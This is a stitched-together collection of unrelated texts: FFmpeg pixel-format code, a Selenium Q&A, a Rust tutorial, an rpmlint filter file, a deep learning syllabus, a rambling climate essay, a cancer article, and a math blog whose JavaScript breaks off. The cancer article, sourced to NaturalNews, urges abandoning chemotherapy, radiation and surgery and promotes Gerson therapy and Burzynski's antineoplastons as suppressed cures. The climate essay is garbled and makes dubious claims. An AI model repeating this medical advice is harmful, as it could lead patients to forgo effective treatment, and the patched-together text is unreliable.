        .comp = { {0,1,1,0,15} /* Y */, {1,1,1,0,15} /* U */, {2,1,1,0,15} /* V */ },
    },
    [PIX_FMT_YUV420P16BE] = {
        .name = "yuv420p16be", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 1,
        .comp = { {0,1,1,0,15} /* Y */, {1,1,1,0,15} /* U */, {2,1,1,0,15} /* V */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_YUV422P16LE] = {
        .name = "yuv422p16le", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,15} /* Y */, {1,1,1,0,15} /* U */, {2,1,1,0,15} /* V */ },
    },
    [PIX_FMT_YUV422P16BE] = {
        .name = "yuv422p16be", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,15} /* Y */, {1,1,1,0,15} /* U */, {2,1,1,0,15} /* V */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_YUV444P16LE] = {
        .name = "yuv444p16le", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,15} /* Y */, {1,1,1,0,15} /* U */, {2,1,1,0,15} /* V */ },
    },
    [PIX_FMT_YUV444P16BE] = {
        .name = "yuv444p16be", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,15} /* Y */, {1,1,1,0,15} /* U */, {2,1,1,0,15} /* V */ },
        .flags = PIX_FMT_BE,
    },
};

int av_get_bits_per_pixel(const AVPixFmtDescriptor *pixdesc)
{
    int c, bits = 0;
    int log2_pixels = pixdesc->log2_chroma_w + pixdesc->log2_chroma_h;

    for (c = 0; c < pixdesc->nb_channels; c++) {
        int s = c == 1 || c == 2 ? 0 : log2_pixels;
        bits += (pixdesc->comp[c].depth_minus1 + 1) << s;
    }

    return bits >> log2_pixels;
}
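The descriptor table and av_get_bits_per_pixel() can be exercised with a small driver program. The following is a minimal sketch, not part of pixdesc.c, assuming it is compiled in the same tree so the two headers resolve. For yuv420p the arithmetic works out as follows: Y has depth_minus1 = 7 and is shifted by log2_chroma_w + log2_chroma_h = 2 (one sample per pixel, counted per 2x2 block), contributing 8 << 2 = 32; the subsampled U and V planes contribute 8 each per block; and (32 + 8 + 8) >> 2 = 12 bits per pixel on average.

#include <stdio.h>
#include "pixfmt.h"
#include "pixdesc.h"

int main(void)
{
    /* yuv420p: 8-bit luma per pixel, one 8-bit U and V sample per 2x2 block */
    const AVPixFmtDescriptor *d = &av_pix_fmt_descriptors[PIX_FMT_YUV420P];
    printf("%s: %d bits per pixel\n", d->name, av_get_bits_per_pixel(d)); /* prints 12 */
    return 0;
}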
I have a table called UserManagement that contains information about the user. This table gets updated whenever a new user is created. If I create two users, then I need to check whether the two users were actually created. The table contains ID, UserName, FirstName, LastName, Bdate, etc. Here the ID is generated automatically. I am running a Selenium-TestNG script. Using Selenium, how can I get the UserName of the two users which I have created? Should I iterate through the table? If so, how do I iterate through the table?

3 Answers

Use ISelenium.GetTable(string) to get the contents of the table cells you want. For example, selenium.GetTable("UserManagement.0.1"); will return the contents of the table's first row and second column. You could then assert that the correct username or usernames appear in the table.

  I tried the same using it in a loop as selenium.GetTable("UserManagement.i.1"), where I want to iterate through the loop, but it won't work; selenium.GetTable("UserManagement.0.1") does work instead. Any idea why? – sam Jan 16 '11 at 15:30
  @sam what values of i are you iterating over? – Wesley Wiser Jan 16 '11 at 18:50
  Following is what I am trying to do (i is a counter up to the number of rows): For i As Integer = 1 To NumOfRows : Dim strTableColumn As String = selenium.GetTable("Group.i.1") : If (strTableColumn = pword) Then ReturnValue = i : IsFound = True : Exit For : End If : Next – sam Jan 17 '11 at 8:16
  @sam looks like you have 2 issues: you're starting at 1 instead of 0 and you need to use string concatenation to build the locator "Group." + i + ".1" instead of "Group.i.1" – Wesley Wiser Jan 18 '11 at 4:35

Get the count of rows using selenium.getXpathCount() into a variable rowCount, put the column count in a variable, e.g. int colCount = 5;, and put the required new user in String user1 = "ABC";. Then:

int rowCount = selenium.getXpathCount("//table[@id='dldl']/tbody/tr").intValue();
int colCount = 5;
String user1 = "ABC";
boolean isFound = false;
for (int i = 0; i < rowCount && !isFound; i++) {
    for (int j = 0; j < colCount; j++) {
        if (user1.equals(selenium.getTable("dldl." + i + "." + j))) {
            System.out.println(user1 + " inserted");
            isFound = true;
            break;
        }
    }
}

Get the number of rows using:

int noOfRowsInTable = selenium.getXpathCount("//table[@id='TableId']//tr").intValue();

If the UserName you want to get is at a fixed position, let's say the 2nd column, then for each row i iterate as given below (XPath indices start at 1):

selenium.getText("xpath=//table[@id='TableId']//tr[" + i + "]//td[2]");

Note: we can find the number of columns in that table using the same procedure:

int noOfColumnsInTable = selenium.getXpathCount("//table[@id='TableId']//tr//td").intValue();
Share this page Learn X in Y minutes Where X=Rust Rust is a programming language developed by Mozilla Research. Rust combines low-level control over performance with high-level convenience and safety guarantees. It achieves these goals without requiring a garbage collector or runtime, making it possible to use Rust libraries as a “drop-in replacement” for C. Rust’s first release, 0.1, occurred in January 2012, and for 3 years development moved so quickly that until recently the use of stable releases was discouraged and instead the general advice was to use nightly builds. On May 15th 2015, Rust 1.0 was released with a complete guarantee of backward compatibility. Improvements to compile times and other aspects of the compiler are currently available in the nightly builds. Rust has adopted a train-based release model with regular releases every six weeks. Rust 1.1 beta was made available at the same time of the release of Rust 1.0. Although Rust is a relatively low-level language, it has some functional concepts that are generally found in higher-level languages. This makes Rust not only fast, but also easy and efficient to code in. // This is a comment. Line comments look like this... // and extend multiple lines like this. /// Documentation comments look like this and support markdown notation. /// # Examples /// /// ``` /// let five = 5 /// ``` /////////////// // 1. Basics // /////////////// #[allow(dead_code)] // Functions // `i32` is the type for 32-bit signed integers fn add2(x: i32, y: i32) -> i32 { // Implicit return (no semicolon) x + y } #[allow(unused_variables)] #[allow(unused_assignments)] #[allow(dead_code)] // Main function fn main() { // Numbers // // Immutable bindings let x: i32 = 1; // Integer/float suffixes let y: i32 = 13i32; let f: f64 = 1.3f64; // Type inference // Most of the time, the Rust compiler can infer what type a variable is, so // you don’t have to write an explicit type annotation. // Throughout this tutorial, types are explicitly annotated in many places, // but only for demonstrative purposes. Type inference can handle this for // you most of the time. let implicit_x = 1; let implicit_f = 1.3; // Arithmetic let sum = x + y + 13; // Mutable variable let mut mutable = 1; mutable = 4; mutable += 2; // Strings // // String literals let x: &str = "hello world!"; // Printing println!("{} {}", f, x); // 1.3 hello world // A `String` – a heap-allocated string let s: String = "hello world".to_string(); // A string slice – an immutable view into another string // The string buffer can be statically allocated like in a string literal // or contained in another object (in this case, `s`) let s_slice: &str = &s; println!("{} {}", s, s_slice); // hello world hello world // Vectors/arrays // // A fixed-size array let four_ints: [i32; 4] = [1, 2, 3, 4]; // A dynamic array (vector) let mut vector: Vec<i32> = vec![1, 2, 3, 4]; vector.push(5); // A slice – an immutable view into a vector or array // This is much like a string slice, but for vectors let slice: &[i32] = &vector; // Use `{:?}` to print something debug-style println!("{:?} {:?}", vector, slice); // [1, 2, 3, 4, 5] [1, 2, 3, 4, 5] // Tuples // // A tuple is a fixed-size set of values of possibly different types let x: (i32, &str, f64) = (1, "hello", 3.4); // Destructuring `let` let (a, b, c) = x; println!("{} {} {}", a, b, c); // 1 hello 3.4 // Indexing println!("{}", x.1); // hello ////////////// // 2. 
    //////////////

    // Struct
    struct Point {
        x: i32,
        y: i32,
    }

    let origin: Point = Point { x: 0, y: 0 };

    // A struct with unnamed fields, called a ‘tuple struct’
    struct Point2(i32, i32);

    let origin2 = Point2(0, 0);

    // Basic C-like enum
    enum Direction {
        Left,
        Right,
        Up,
        Down,
    }

    let up = Direction::Up;

    // Enum with fields
    enum OptionalI32 {
        AnI32(i32),
        Nothing,
    }

    let two: OptionalI32 = OptionalI32::AnI32(2);
    let nothing = OptionalI32::Nothing;

    // Generics //

    struct Foo<T> { bar: T }

    // This is defined in the standard library as `Option`
    enum Optional<T> {
        SomeVal(T),
        NoVal,
    }

    // Methods //

    impl<T> Foo<T> {
        // Methods take an explicit `self` parameter
        fn bar(&self) -> &T { // self is borrowed
            &self.bar
        }
        fn bar_mut(&mut self) -> &mut T { // self is mutably borrowed
            &mut self.bar
        }
        fn into_bar(self) -> T { // here self is consumed
            self.bar
        }
    }

    let a_foo = Foo { bar: 1 };
    println!("{}", a_foo.bar()); // 1

    // Traits (known as interfaces or typeclasses in other languages) //

    trait Frobnicate<T> {
        fn frobnicate(self) -> Option<T>;
    }

    impl<T> Frobnicate<T> for Foo<T> {
        fn frobnicate(self) -> Option<T> {
            Some(self.bar)
        }
    }

    let another_foo = Foo { bar: 1 };
    println!("{:?}", another_foo.frobnicate()); // Some(1)

    /////////////////////////
    // 3. Pattern matching //
    /////////////////////////

    let foo = OptionalI32::AnI32(1);
    match foo {
        OptionalI32::AnI32(n) => println!("it’s an i32: {}", n),
        OptionalI32::Nothing  => println!("it’s nothing!"),
    }

    // Advanced pattern matching
    struct FooBar { x: i32, y: OptionalI32 }
    let bar = FooBar { x: 15, y: OptionalI32::AnI32(32) };

    match bar {
        FooBar { x: 0, y: OptionalI32::AnI32(0) } =>
            println!("The numbers are zero!"),
        FooBar { x: n, y: OptionalI32::AnI32(m) } if n == m =>
            println!("The numbers are the same"),
        FooBar { x: n, y: OptionalI32::AnI32(m) } =>
            println!("Different numbers: {} {}", n, m),
        FooBar { x: _, y: OptionalI32::Nothing } =>
            println!("The second number is Nothing!"),
    }

    /////////////////////
    // 4. Control flow //
    /////////////////////

    // `for` loops/iteration
    let array = [1, 2, 3];
    for i in array.iter() {
        println!("{}", i);
    }

    // Ranges
    for i in 0u32..10 {
        print!("{} ", i);
    }
    println!("");
    // prints `0 1 2 3 4 5 6 7 8 9 `

    // `if`
    if 1 == 1 {
        println!("Maths is working!");
    } else {
        println!("Oh no...");
    }

    // `if` as expression
    let value = if true {
        "good"
    } else {
        "bad"
    };

    // `while` loop
    while 1 == 1 {
        println!("The universe is operating normally.");
        // break statement gets out of the while loop.
        // It avoids useless iterations.
        break
    }

    // Infinite loop
    loop {
        println!("Hello!");
        // break statement gets out of the loop
        break
    }

    /////////////////////////////////
    // 5. Memory safety & pointers //
    /////////////////////////////////

    // Owned pointer – only one thing can ‘own’ this pointer at a time
    // This means that when the `Box` leaves its scope, it can be automatically deallocated safely.
    let mut mine: Box<i32> = Box::new(3);
    *mine = 5; // dereference
    // Here, `now_its_mine` takes ownership of `mine`. In other words, `mine` is moved.
    let mut now_its_mine = mine;
    *now_its_mine += 2;

    println!("{}", now_its_mine); // 7
    // println!("{}", mine); // this would not compile because `now_its_mine` now owns the pointer

    // Reference – an immutable pointer that refers to other data
    // When a reference is taken to a value, we say that the value has been ‘borrowed’.
    // While a value is borrowed immutably, it cannot be mutated or moved.
    // A borrow is active until the last use of the borrowing variable.
    let mut var = 4;
    var = 3;
    let ref_var: &i32 = &var;

    println!("{}", var); // Unlike `mine`, `var` can still be used
    println!("{}", *ref_var);
    // var = 5; // this would not compile because `var` is borrowed
    // *ref_var = 6; // this would not either, because `ref_var` is an immutable reference
    ref_var; // no-op, but counts as a use and keeps the borrow active
    var = 2; // ref_var is no longer used after the line above, so the borrow has ended

    // Mutable reference
    // While a value is mutably borrowed, it cannot be accessed at all.
    let mut var2 = 4;
    let ref_var2: &mut i32 = &mut var2;
    *ref_var2 += 2; // '*' is used to point to the mutably borrowed var2

    println!("{}", *ref_var2); // 6 , // var2 would not compile.
    // ref_var2 is of type &mut i32, so stores a reference to an i32, not the value.
    // var2 = 2; // this would not compile because `var2` is borrowed.

    ref_var2; // no-op, but counts as a use and keeps the borrow active until here
}

Further reading

There’s a lot more to Rust—this is just the basics of Rust so you can understand the most important things. To learn more about Rust, read The Rust Programming Language and check out the /r/rust subreddit. The folks on the #rust channel on irc.mozilla.org are also always keen to help newcomers. You can also try out features of Rust with an online compiler at the official Rust playpen or on the main Rust website.

Got a suggestion? A correction, perhaps? Open an Issue on the Github Repo, or make a pull request yourself!

Originally contributed by P1start, and updated by 13 contributor(s).
python3.11/rpmlint.toml (TOML)

Filters = [
    # KNOWN BUGS:
    # https://bugzilla.redhat.com/show_bug.cgi?id=1489816
    'crypto-policy-non-compliance-openssl',

    # TESTS:
    '(zero-length|pem-certificate|uncompressed-zip) /usr/lib(64)?/python3\.\d+/test',

    # OTHER DELIBERATES:
    # chroot function
    'missing-call-to-chdir-with-chroot',
    # gethostbyname function calls gethostbyname
    '(E|W): binary-or-shlib-calls-gethostbyname /usr/lib(64)?/python3\.\d+/lib-dynload/_socket\.',
    # intentionally unversioned and selfobsoleted
    'unversioned-explicit-obsoletes python',
    'unversioned Obsoletes: Obsoletes: python3\.\d+$',
    'self-obsoletion python3\.\d+(-\S+)? obsoletes python3\.\d+(-\S+)?',
    # intentionally hardcoded
    'hardcoded-library-path in %{_prefix}/lib/(debug/%{_libdir}|python%{pybasever})',
    # we have non binary stuff, python files
    'only-non-binary-in-usr-lib',
    # some devel files that are deliberately needed
    'devel-file-in-non-devel-package /usr/include/python3\.\d+m?/pyconfig-(32|64)\.h',
    'devel-file-in-non-devel-package /usr/lib(64)?/python3\.\d+/distutils/tests/xxmodule\.c',
    # ...or are used as test data
    'devel-file-in-non-devel-package /usr/lib(64)?/python3\.\d+/test',
    # some bytecode is shipped without sources on purpose, as a space optimization
    # if this regex needs to be relaxed in the future, make sure it **does not** match pyc files in __pycache__
    'python-bytecode-without-source /usr/lib(64)?/python3\.\d+/(encodings|pydoc_data)/[^/]+.pyc',

    # DUPLICATE FILES
    # test data are often duplicated
    '(E|W): files-duplicate /usr/lib(64)?/python3\.\d+/(test|__phello__)/',
    # duplicated inits or mains are also common
    '(E|W): files-duplicate .+__init__\.py.+__init__\.py',
    '(E|W): files-duplicate .+__main__\.py.+__main__\.py',
    # files in the debugsource package
    '(E|W): files-duplicate /usr/src/debug',
    # general waste report
    '(E|W): files-duplicated-waste',

    # SORRY, NOT SORRY:
    # manual pages
    'no-manual-page-for-binary (idle|pydoc|pyvenv|2to3|python3?-debug|pathfix|msgfmt|pygettext)',
    'no-manual-page-for-binary python3?.*-config$',
    'no-manual-page-for-binary python3\.\d+dm?$',
    # missing documentation from subpackages
    '^python3(\.\d+)?-(debug|tkinter|test|idle)\.[^:]+: (E|W): no-documentation',
    # platform python is obsoleted, but not provided
    'obsolete-not-provided platform-python',
    # we have extra tokens at the end of %endif/%else directives, we consider them useful
    'extra tokens at the end of %(endif|else) directive',

    # RPMLINT IMPERFECTIONS
    # https://github.com/rpm-software-management/rpmlint/issues/780
    '/usr/lib/debug',
    # we provide python(abi) manually to be sure.
    # createrepo will merge this with the automatic
    'python3(\.\d+)?\.[^:-]+: (E|W): useless-provides python\(abi\)',
    # debugsource and debuginfo have no docs
    '^python3(\.\d+)?-debug(source|info)\.[^:]+: (E|W): no-documentation',
    # this is OK for F28+
    'library-without-ldconfig-post',
    # debug package contains devel and non-devel files
    'python3(\.\d+)?-debug\.[^:]+: (E|W): (non-)?devel-file-in-(non-)?devel-package',
    # this goes to other subpackage, hence not actually dangling
    'dangling-relative-symlink /usr/bin/python python3',
    'dangling-relative-symlink /usr/share/man/man1/python\.1\.gz python3\.1\.gz',
    'dangling-relative-symlink /usr/lib(64)?/pkgconfig/python-3\.\d+dm?(-embed)?\.pc python-3\.\d+(-embed)?\.pc',
    # the python-unversioned-command package contains dangling symlinks by design
    '^python-unversioned-command\.[^:]+: (E|W): dangling-relative-symlink (/usr/bin/python \./python3|/usr/share/man/man1/python\.1\S* ./python3\.1\S*)$',
    # we need this macro to evaluate, even if the line starts with #
    'macro-in-comment %\{_pyconfig(32|64)_h\}',
    # Python modules don't need to be linked against libc
    # Since 3.8 they are no longer linked against libpython3.8.so.1.0
    '(E|W): library-not-linked-against-libc /usr/lib(64)?/python3\.\d+/lib-dynload/',
    '(E|W): shared-lib(rary)?-without-dependency-information /usr/lib(64)?/python3\.\d+/lib-dynload/',
    # specfile-errors are listed twice, once with reason and once without
    # we filter out the empty ones
    '\bpython3(\.\d+)?\.(src|spec): (E|W): specfile-error\s+$',

    # SPELLING ERRORS
    'spelling-error .* en_US (bytecode|pyc|filename|tkinter|namespaces|pytest) ',
]
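Each entry in Filters is a regular expression matched against rpmlint's output; messages that match are suppressed. As a quick illustration of the matching behaviour (not part of the packaging config; the sample messages below are hypothetical):

    import re

    # One of the filter patterns from the TOML above.
    pattern = r"no-manual-page-for-binary (idle|pydoc|pyvenv|2to3|python3?-debug|pathfix|msgfmt|pygettext)"
    messages = [
        "python3.11.x86_64: W: no-manual-page-for-binary pydoc3.11",
        "python3.11.x86_64: W: no-manual-page-for-binary sometool",
    ]
    for msg in messages:
        # A match means the message would be filtered out of the report.
        print("filtered" if re.search(pattern, msg) else "reported", "-", msg)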
COMPGI22 - Advanced Deep Learning and Reinforcement Learning

This database contains the 2017-18 versions of syllabuses. Syllabuses from the 2016-17 session are available here. Note: whilst every effort is made to keep the syllabus and assessment records correct, the precise details must be checked with the lecturer(s).

Code: COMPGI22 (also taught as COMPMI22)
Year: MSc
Prerequisites: Probability, calculus and linear algebra, plus COMPGI01 Supervised Learning, COMPGI08 Graphical Models, or COMPGI18 Probabilistic and Unsupervised Learning. In order to successfully complete the coursework for this module, students will require excellent coding skills in Python.
Term: 2
Taught by: Thore Graepel (50%), Hado van Hasselt (50%). The course is taught in collaboration with DeepMind. The majority of lectures will be taught by guest lecturers from DeepMind who are leading experts in the field of machine learning and will teach about topics in which they are specialised.

Aims: Students successfully completing the module should understand:
1. The basics of the deep learning and reinforcement learning paradigms
2. Architectures and optimization methods for deep neural network training
3. How to implement deep learning methods within TensorFlow and apply them to data
4. The theoretical foundations and algorithms of reinforcement learning
5. How to apply reinforcement learning algorithms to environments with complex dynamics

Learning outcomes: To understand the foundations of deep learning, reinforcement learning, and deep reinforcement learning, including the ability to successfully implement, apply and test relevant learning algorithms in TensorFlow.

Content: The course has two interleaved parts that converge towards the end of the course. One part is on machine learning with deep neural networks; the other part is about prediction and control using reinforcement learning. The two strands come together when we discuss deep reinforcement learning, where deep neural networks are trained as function approximators in a reinforcement learning setting. The deep learning stream of the course will cover a short introduction to neural networks and supervised learning with TensorFlow, followed by lectures on convolutional neural networks, recurrent neural networks, end-to-end and energy-based learning, optimization methods, unsupervised learning, and attention and memory. Possible application areas to be discussed include object recognition and natural language processing. The reinforcement learning stream will cover Markov decision processes, planning by dynamic programming, model-free prediction and control, value function approximation, policy gradient methods, integration of learning and planning, and the exploration/exploitation dilemma (a toy illustration of model-free control is sketched after this entry). Possible applications to be discussed include learning to play classic board games as well as video games.

Method of instruction: Lectures, reading, and coursework assignments. Coursework will focus on the practical implementation of deep neural network training and reinforcement learning algorithms and architectures in TensorFlow.

Assessment: The course has the following assessment components:
• Coursework (100%)
• Deep Learning: programming and experimentation in Python/TensorFlow
• Reinforcement Learning: programming and experimentation in Python/TensorFlow
To pass this course, students must:
• Obtain an overall pass mark of 50% for all sections combined.
• Obtain at least 50% in both Deep Learning and Reinforcement Learning.
Resources: Reading list available via the UCL Library catalogue.
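As a flavour of the "model-free prediction and control" topic listed in the syllabus, here is a minimal tabular Q-learning sketch in plain Python/NumPy. This is not course material: the toy chain environment, reward scheme, and hyperparameters are all illustrative assumptions.

    import numpy as np

    n_states, n_actions = 5, 2
    Q = np.zeros((n_states, n_actions))
    alpha, gamma, epsilon = 0.1, 0.99, 0.1  # illustrative hyperparameters

    def step(s, a):
        # Hypothetical toy environment: action 1 moves right, reward at the last state.
        s_next = min(s + a, n_states - 1)
        reward = 1.0 if s_next == n_states - 1 else 0.0
        return s_next, reward

    rng = np.random.default_rng(0)
    for episode in range(500):
        s = 0
        for t in range(20):
            # Epsilon-greedy action selection balances exploration and exploitation.
            a = int(rng.integers(n_actions)) if rng.random() < epsilon else int(np.argmax(Q[s]))
            s_next, r = step(s, a)
            # Q-learning update: move Q(s, a) toward the bootstrapped target.
            Q[s, a] += alpha * (r + gamma * Q[s_next].max() - Q[s, a])
            s = s_next

    print(Q)

In the deep reinforcement learning setting discussed in the course, the table Q would be replaced by a neural network function approximator trained on the same kind of bootstrapped targets.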
The Effects of Climate Change on the Human Environment

"Environment" refers to the entire planet in space and time. The environment is the overall condition of a planet at its current stage of development, understood in light of the information and scientific knowledge available at the present time. The word is often used in science fiction novels, where a future world is described and sometimes deliberately left ambiguous to invoke fear and mystery, but it is also used in everyday life, though not always with that intent. It can refer to how the world works in general, including the processes by which people interact with one another, the physical environment one lives in, the cultural and socio-linguistic features of one's culture, and the political environment one sees.

The natural environment of the Earth encompasses all living and non-living things existing simultaneously; in this sense it is not man-made. The word is most commonly used in reference to the Earth or its parts in geology, astronomy, topography, and biology, but the term covers all aspects of the Earth's environment. These include humans, their interactions with one another, the physical processes by which they survive and thrive, the climate in which they live (including temperature, precipitation, wind, clouds, rainfall, land elevation, and soil fertility), and the biological diversity of the entire living world.

A large portion of the Earth's environment is made up of living organisms. These organisms have developed through a process called natural selection: the gradual evolution over time of traits (adaptations) that serve an organism's fitness in a specific environment. An adaptation is the resulting change in traits, from one state to another, that serves an organism's fitness in its current environment. All land animals and plants are considered adapted to their current environment if and when changes in the environment enable those organisms to adapt by changing their traits to match it.

But the environment is constantly changing, and it is very difficult to keep track of all the changes that take place within the living Earth. Furthermore, most Earth systems are extremely complex and easily unbalanced. This is compounded by the fact that most Earth systems are connected in networks, a super-network of interacting environments known as ecosystems. Ecosystems are highly delicate, and there is a great deal of interdependence among them. A great deal of energy, water, heat, chemicals, light, and other vital life-sustaining materials is therefore required to maintain the ongoing balance of ecosystems and their environments. Without these ecosystems, or the built environments that depend on them, human civilizations would quickly become unsustainable.

One of the most serious consequences of climate change is the possibility of drought, which has the potential to devastate human civilizations, possibly leading to wars and the deaths of millions. One reason the potential impact of climate change is so severe is the rapid rate at which the Earth's environment is being destroyed. The destruction of the Earth's ecosystems and built environments by human beings is directly proportional to the accumulation of carbon dioxide and other greenhouse gases in the Earth's atmosphere.
Therefore, by understanding how the Earth's ecosystems interact and work, it becomes possible to save them from collapse. A better understanding of the interdependence and feedback mechanisms among Earth's ecosystems can help us design better strategies for avoiding the catastrophic devastation of the planet's ecosystems and built environments, and a better appreciation of the importance of natural environments will provide a greater number of solutions to global warming than have been available up to now.
Three recent studies published in the journals Nature and Science shed new light on why chemotherapy, a common conventional treatment for cancer, typically fails to eradicate cancer permanently. Based on numerous assessments of how cancer cells multiply and spread, researchers from several countries have confirmed that cancer tumors generate their own stem cells, which in turn feed the re-growth of new tumors after earlier ones have been eliminated.

What the Studies Demonstrated

In one of the studies published in the journal Nature, researcher Luis Parada from the University of Texas Southwestern Medical Center in Dallas and his colleagues investigated how new tumors are able to re-grow after previous ones have been wiped out with chemotherapy. To do this, Parada and his team identified and genetically labeled cancer cells in brain tumors of mice before proceeding to treat the tumors with conventional chemotherapy. What they discovered was that, although chemotherapy appeared in many cases to successfully kill tumor cells and temporarily stop the growth and spread of cancer, the treatment ultimately failed to prevent new tumors from forming. The culprit, it turns out, was cancer stem cells that persisted long after chemotherapy and quietly prompted the re-growth of new tumors later down the road.

A second study published in Nature found similar results using skin tumors, while a third, published in the journal Science, confirmed both of the other studies in research involving intestinal polyps. It appears as though, across the board, cancer tumors possess an inherent ability to produce their own stem cells, which can circulate throughout the body and develop into tumors, and traditional cancer treatments do nothing to address them.

Forward-thinking Cancer Experts Suggest Abandoning Chemotherapy, Radiation, and Surgery To Treat Cancer

Researchers at the University of Michigan's Comprehensive Cancer Center appear to agree with these conclusions and, along with many others, are now suggesting a completely new approach to cancer treatment. Progressive cancer researchers believe it is now time to move forward with investigating new treatment approaches. "Traditional therapies like surgery, chemotherapy, and radiation do not destroy the small number of cells driving the cancer's growth," says UM's Comprehensive Cancer Center. "Instead of trying to kill all the cells in a tumor with chemotherapy or radiation, we believe it would be more effective to use treatments targeted directly at these so-called cancer stem cells. If the stem cells were eliminated, the cancer would be unable to grow and spread to other locations in the body."

Alternative cancer therapies like the Gerson therapy (www.gerson.org) and Dr. Stanislaw Burzynski's antineoplastons (www.burzynskiclinic.com), for instance, are already treating cancers in this way. But because of censorship issues and medical tyranny, these treatments are still not widely accepted, and are actually considered fraudulent by the U.S. Food and Drug Administration (FDA) and virtually all state and federal medical boards in the US.

The Top Cancer Fighting Foods

1. Carrots
Carrots are rich in beta-carotene, a strong antioxidant that is said to help keep stomach, prostate, and lung cancer away.

2. Cabbage and Broccoli
Cabbages contain cancer-fighting indole-3-carbinol, which is said to help ward off cancer.
Broccoli is a well-known cancer-busting vegetable, as its glucoraphanin content is said to protect the body from rectal and colon cancer.

3. Tomato
Containing a rich source of the antioxidant lycopene, tomatoes are said to protect the body from various cancer cells, and they are also packed with vitamin C, which helps strengthen the body's immune system.

4. Garlic
Garlic isn't just a great way to flavor our food; it's a clever way of incorporating a cancer-busting food into our diet. Garlic is said to boost immunity, which helps our body fight against harmful cancerous cells. Chives, leeks, and onions are also part of the allium vegetable group, which is said to help reduce the risks of stomach, colon, and prostate cancer.

5. Flax Seeds
Flax seeds contain strong antioxidants called lignans, which help keep cells healthy and safe from cancerous cells. They also contain omega-3 fatty acids, which are believed to help prevent colon cancer.

6. Blueberries
Rated as one of the highest-antioxidant foods, blueberries keep the body's cells healthy and full of oxygen, warding off attacks by cancerous cells.

Source: www.naturalnews.com/037148...
Saturday, January 13, 2018 (blog: 学習環境)

Let's work through Problem 6 of Chapter 14 (Functions of Several Variables), Section 14.1 (Differentiability and Gradient Vectors), in Introduction to Analysis, Vol. 3 by Kazuo Matsuzaka (Iwanami Shoten).

1.
\[
f(x, y) = \frac{x^2}{a^2} + \frac{y^2}{b^2}, \qquad
\mathbf{n} = \operatorname{grad} f(x_0, y_0) = \left( \frac{2x_0}{a^2},\ \frac{2y_0}{b^2} \right)
\]
\[
\mathbf{n} \cdot (x, y) = \mathbf{n} \cdot (x_0, y_0)
\;\Longrightarrow\;
\frac{2x_0 x}{a^2} + \frac{2y_0 y}{b^2} = \frac{2x_0^2}{a^2} + \frac{2y_0^2}{b^2} = 2
\;\Longrightarrow\;
\frac{x_0 x}{a^2} + \frac{y_0 y}{b^2} = 1
\]

2.
\[
f(x, y) = x^2 + y^2, \qquad u = (x, y, z), \qquad g(u) = f(x, y) - z
\]
\[
\operatorname{grad} g(1, -2, 5) \cdot \bigl( (x, y, z) - (1, -2, 5) \bigr) = 0
\;\Longrightarrow\;
\bigl( \operatorname{grad} f(1, -2),\ -1 \bigr) \cdot (x - 1,\ y + 2,\ z - 5) = 0
\]
\[
(2, -4, -1) \cdot (x - 1,\ y + 2,\ z - 5) = 0
\;\Longrightarrow\;
2x - 2 - 4y - 8 - z + 5 = 0
\;\Longrightarrow\;
2x - 4y - z = 5
\]

3.
\[
f(x, y, z) = xyz, \qquad
\mathbf{n} = \operatorname{grad} f(x_0, y_0, z_0) = (y_0 z_0,\ z_0 x_0,\ x_0 y_0)
\]
\[
\mathbf{n} \cdot (x, y, z) = \mathbf{n} \cdot (x_0, y_0, z_0)
\;\Longrightarrow\;
x y_0 z_0 + x_0 y z_0 + x_0 y_0 z = 3 x_0 y_0 z_0
\]

4.
\[
f(x, y) = xy, \qquad u = (x, y, z), \qquad g(u) = f(x, y) - z^2
\]
\[
\operatorname{grad} g(1, 4, 2) \cdot \bigl( (x, y, z) - (1, 4, 2) \bigr) = 0
\;\Longrightarrow\;
\bigl( \operatorname{grad} f(1, 4),\ -4 \bigr) \cdot (x - 1,\ y - 4,\ z - 2) = 0
\]
\[
4(x - 1) + (y - 4) - 4(z - 2) = 0
\;\Longrightarrow\;
4x + y - 4z = 0
\]

Code (Emacs)

Python 3

    #!/usr/bin/env python3
    from sympy import pprint, symbols, solve

    x, y, x0, y0, a, b = symbols('x, y, x0, y0, a, b')

    eq1 = x ** 2 / a ** 2 + y ** 2 / b ** 2 - 1
    eq2 = x0 * x / a ** 2 + y0 * y / b ** 2 - 1

    for eq in [eq1, eq2]:
        pprint(eq)
        print()
        for t in solve(eq, y):
            pprint(t)
            print()
        print()

Input/output (Terminal, Jupyter (IPython))

    $ ./sample6.py
    -1 + y**2/b**2 + x**2/a**2

    -b*sqrt((a - x)*(a + x))/a

    b*sqrt((a - x)*(a + x))/a

    -1 + y*y0/b**2 + x*x0/a**2

    b**2*(a**2 - x*x0)/(a**2*y0)

    $

HTML5

    <div id="graph0"></div>
    <pre id="output0"></pre>
    <label for="r0">r = </label>
    <input id="r0" type="number" min="0" value="0.5">
    <label for="dx">dx = </label>
    <input id="dx" type="number" min="0" step="0.0001" value="0.001">
    <br>
    <label for="x1">x1 = </label>
    <input id="x1" type="number" value="-5">
    <label for="x2">x2 = </label>
    <input id="x2" type="number" value="5">
    <br>
    <label for="y1">y1 = </label>
    <input id="y1" type="number" value="-5">
    <label for="y2">y2 = </label>
    <input id="y2" type="number" value="5">
    <br>
    <label for="a0">a = </label>
    <input id="a0" type="number" value="1">
    <label for="b0">b = </label>
    <input id="b0" type="number" value="1">
    <label for="x0">x0 = </label>
    <input id="x0" type="number" value="0">
    <label for="y0">y0 = </label>
    <input id="y0" type="number" value="1">
    <button id="draw0">draw</button>
    <button id="clear0">clear</button>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/d3/4.2.6/d3.min.js" integrity="sha256-5idA201uSwHAROtCops7codXJ0vja+6wbBrZdQ6ETQc=" crossorigin="anonymous"></script>
    <script src="sample6.js"></script>

JavaScript

    let div0 = document.querySelector('#graph0'),
        pre0 = document.querySelector('#output0'),
        width = 600,
        height = 600,
        padding = 50,
        btn0 = document.querySelector('#draw0'),
        btn1 = document.querySelector('#clear0'),
        input_r = document.querySelector('#r0'),
        input_dx = document.querySelector('#dx'),
